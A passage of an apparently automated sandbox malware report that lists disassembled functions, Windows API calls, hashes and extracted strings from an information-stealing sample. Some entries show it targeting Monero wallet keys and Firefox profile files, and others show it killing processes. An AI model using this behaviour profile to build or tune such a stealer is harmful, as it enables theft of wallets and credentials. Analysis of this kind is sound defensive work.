                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: `
                                      • API String ID: 3334442632-4168407445
                                      • Opcode ID: 92a468fff563d1c11bdb5841d1a8c0b3560827091013acb6723a900f84d49a13
                                      • Instruction ID: e7772ca5e9da845b0956adfa8259a9c71c287f09989adaea0523826801cdebe7
                                      • Opcode Fuzzy Hash: 92a468fff563d1c11bdb5841d1a8c0b3560827091013acb6723a900f84d49a13
                                      • Instruction Fuzzy Hash: 6A91F572A001149BCB18FB74FD969ED737DAFA4340F404A68F90656181FF34AB58CB92
                                      Function 00150098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                      • API String ID: 0-1562099544
                                      • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction ID: 14c0675e41154c0678171b1c5052b557cdebcb1ad6644fb204c024f0b37c4f20
                                      • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction Fuzzy Hash: 92E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                      Function 0011F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001316B0,00130D97), ref: 0011F81E
                                      • StrCmpCA.SHLWAPI(?,001316B4), ref: 0011F86F
                                      • StrCmpCA.SHLWAPI(?,001316B8), ref: 0011F885
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0011FBB1
                                      • FindClose.KERNEL32(000000FF), ref: 0011FBC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: prefs.js
                                      • API String ID: 3334442632-3783873740
                                      • Opcode ID: 874e6bbc8448fddbbba08cbeed594d11e82c28981d73a589d697d631b56363d3
                                      • Instruction ID: c5283280c26454942b24af00ce53427abefa2af398297d913f1c4ee7884bcd29
                                      • Opcode Fuzzy Hash: 874e6bbc8448fddbbba08cbeed594d11e82c28981d73a589d697d631b56363d3
                                      • Instruction Fuzzy Hash: 65B116719001289BCB28FF64ED96FED7379AF64300F4085A8E50A57191EF306B59CF92
                                      Function 00574AF4 Relevance: 15.4, Strings: 11, Instructions: 1614COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: Cr$B_?$PLtZ$\rm?$]5Hx$hI]n$od;$sd;$v_$~jnm$,f
                                      • API String ID: 0-1983312684
                                      • Opcode ID: b7f7dca629319acab6db810f9ea781730ba5474d50a4655268412a921331978b
                                      • Instruction ID: ce98ccef12404b2775ad885fd8863a03edc38b100c28e0d25611dbe271900671
                                      • Opcode Fuzzy Hash: b7f7dca629319acab6db810f9ea781730ba5474d50a4655268412a921331978b
                                      • Instruction Fuzzy Hash: A9B2E6F3A0C2109FE304AE2DEC8577ABBE9EB94760F16493DEAC5D3744E63558008697
                                      Function 00111710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0013523C,?,?,?,001352E4,?,?,00000000,?,00000000), ref: 00111963
                                      • StrCmpCA.SHLWAPI(?,0013538C), ref: 001119B3
                                      • StrCmpCA.SHLWAPI(?,00135434), ref: 001119C9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00111D80
                                      • DeleteFileA.KERNEL32(00000000), ref: 00111E0A
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00111E60
                                      • FindClose.KERNEL32(000000FF), ref: 00111E72
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 1415058207-1173974218
                                      • Opcode ID: 171706d1843a3e7a1d7de17952ae011a9bdd13b7212654013c02f8d6b9c42512
                                      • Instruction ID: 972b59af105c30a6036359a49d17de999386bb0c403f29db2df4f1919444522e
                                      • Opcode Fuzzy Hash: 171706d1843a3e7a1d7de17952ae011a9bdd13b7212654013c02f8d6b9c42512
                                      • Instruction Fuzzy Hash: 5412D671910128ABCB19FB60EDA6EEE737DAF64300F8045E9B50666091EF706F98CF51
                                      Function 0011DF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00130C32), ref: 0011DF5E
                                      • StrCmpCA.SHLWAPI(?,001315C0), ref: 0011DFAE
                                      • StrCmpCA.SHLWAPI(?,001315C4), ref: 0011DFC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0011E4E0
                                      • FindClose.KERNEL32(000000FF), ref: 0011E4F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID: \*.*
                                      • API String ID: 2325840235-1173974218
                                      • Opcode ID: 8db3cf78f74f48ccaf6d2f21d07f8ed89ee720a070f69de523d159013ea5f0c7
                                      • Instruction ID: d93aae7a1dc65cd8a894f73004b16548df6456eff004aed9195513b9edee8e10
                                      • Opcode Fuzzy Hash: 8db3cf78f74f48ccaf6d2f21d07f8ed89ee720a070f69de523d159013ea5f0c7
                                      • Instruction Fuzzy Hash: A5F19E719141289BCB29FB60EDA6EEE7379BF64300F8045D9B50A62091EF306F99CF51
                                      Function 0056C3E9 Relevance: 14.1, Strings: 10, Instructions: 1638COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: *i{$5Z&?$>??D$>Lo/$N]?$Y"O[$ZV/{$dh~u$dty$Hu]
                                      • API String ID: 0-4141971620
                                      • Opcode ID: f33e78b3df5c547288e2eaf1263f157497492161db533300f4831c3027ffceb3
                                      • Instruction ID: bbd0b29bb34cdfb5e5b7167cb58cd9a348fb86c11feeb63bff83a4b4ad6e2ded
                                      • Opcode Fuzzy Hash: f33e78b3df5c547288e2eaf1263f157497492161db533300f4831c3027ffceb3
                                      • Instruction Fuzzy Hash: DBB235F3A082149FD3046E2DEC8567ABBE9EF94720F1A4A3DEAC4C7744E63558018797
                                      Function 0056FA53 Relevance: 12.7, Strings: 9, Instructions: 1495COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: &c/;$(nw$:~$Oan>$XFe_$cKI($l~$~Y/$~v8
                                      • API String ID: 0-1850426519
                                      • Opcode ID: 01b9697c0fb4f8ae223b9d1099b8e4d84c7a22a33c2d8da8a38ba1bed6214193
                                      • Instruction ID: cce40f560d7955b5b54cb06ac8743c5a3a83aa6cc39f355c3396f7cb861ad898
                                      • Opcode Fuzzy Hash: 01b9697c0fb4f8ae223b9d1099b8e4d84c7a22a33c2d8da8a38ba1bed6214193
                                      • Instruction Fuzzy Hash: 62B2F3F3A0C2049FD3046F29DC8567AFBE9EF94720F16892DEAC487744EA3558058B97
                                      Function 0056AB67 Relevance: 12.7, Strings: 9, Instructions: 1427COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: %6uf$& $35U+$3fiC$3j?i$?aL$S,~$a7$J]w
                                      • API String ID: 0-3786039081
                                      • Opcode ID: 1cf58d2f07e954b66e7172a48d30dff8000029ffe764f6139ba2fb6ecbff5e16
                                      • Instruction ID: 3eb082bf4344b0c9e736799b7100da2d4e9ea400d18195e1d508fd766ee63b93
                                      • Opcode Fuzzy Hash: 1cf58d2f07e954b66e7172a48d30dff8000029ffe764f6139ba2fb6ecbff5e16
                                      • Instruction Fuzzy Hash: 469249F3A0C2149FE3046E2DEC8567ABBE9EFD4320F1A463DEAC4C7744E93558058696
                                      Function 001298E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00129905
                                      • Process32First.KERNEL32(00119FDE,00000128), ref: 00129919
                                      • Process32Next.KERNEL32(00119FDE,00000128), ref: 0012992E
                                      • StrCmpCA.SHLWAPI(?,00119FDE), ref: 00129943
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0012995C
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0012997A
                                      • CloseHandle.KERNEL32(00000000), ref: 00129987
                                      • CloseHandle.KERNEL32(00119FDE), ref: 00129993
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: e439519152232c2f103c77cdedea692bdd2c4906aa7c96690d970730d40bd405
                                      • Instruction ID: 39c67ee3c3074213038da586f0b002b4082122701e870b9a12776e974b8f4cf2
                                      • Opcode Fuzzy Hash: e439519152232c2f103c77cdedea692bdd2c4906aa7c96690d970730d40bd405
                                      • Instruction Fuzzy Hash: 7A11EF75904318EBDB25DFA4EC88BDDB77DBB48705F00469CF505AA280D7749A84CF90
                                      Function 0011E530 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
